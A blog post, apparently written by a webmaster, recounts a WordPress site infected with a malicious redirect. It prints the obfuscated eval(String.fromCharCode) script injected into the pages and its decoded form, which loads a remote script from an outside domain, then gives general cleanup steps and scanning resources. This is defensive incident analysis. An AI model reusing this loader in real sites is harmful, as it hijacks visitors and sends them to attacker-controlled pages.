Share a Case of a Foreign Trade WordPress Website Being Hacked with Malicious Redirects

Yesterday in a group, I saw a webmaster asking about WordPressbuilt websitethat automatically redirects to someone else's site as soon as it's opened. Then Naiba visited the URL he privately messaged to take a look.

WordPress infected with malicious redirect code

Open your own website, and after most of the website content loads, it automatically redirects to a third-party website, and it will redirect through several sites consecutively. At the same time, the redirected site will ask you to grant it notification permissions, as shown in the image below:Then analyzed the website's source code (many plugins were installed, resulting in a lot of js and other code, making it too messy). Finally, found that the following string of code was abnormal. Asked the webmaster, and it wasn't his own nor from the plugins he installed.

<script>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>

Then Naiba searched for this eval(String.fromCharCode and found the following record article

Record - Website HACKED!

Then viajdstiles.comThis website explains the meaning of the code above.

var d=document;var s=d.createElement('script'); 
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

Parsing the numbers above again reveals the following website.

https://blackawardago.com

Regardless of the final URL that appears, it's clear that the website has been hacked. This is known abroad as WordPress malicious redirect code, which seems to have become popular around 2018. Below are two articles Naiba found while researching.https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-netIf you want to check if your website is also infected with this malicious redirect code, you can use the following website to inspect it.https://sitecheck.sucuri.net/

WordPress Malicious Redirect Code Removal Methods

Of course, if infected with WordPress malicious redirect code, how can it be removed? (Since that site owner didn't ask for my help, Naiba hasn't encountered the actual code. Below are general handling methods shared.)Solution for those who can understand code

1. Find the malicious code and delete it.
2. Check all website files and code to see if there are any other infections or unknown scripts, and delete them.
3. Check if the database is infected; if so, delete the infected content.

Solution for those who cannot understand code

1. Pay someone who understands code to clean it for you. I saw the foreign service above starts at $108/year.
2. Delete the website and reinstall it, ensuring the use of secure themes and plugins, ensuring the database is not infected, and ensuring server security.

If any experts reading this article know how to clean such malicious code or have experience cleaning malicious code, please leave a comment to share.

Finally, recommend a plugin:Install a firewall for WordPress! Try WordfenceRelated knowledge:Implement Security Measures to Avoid WordPress Websites Being Hacked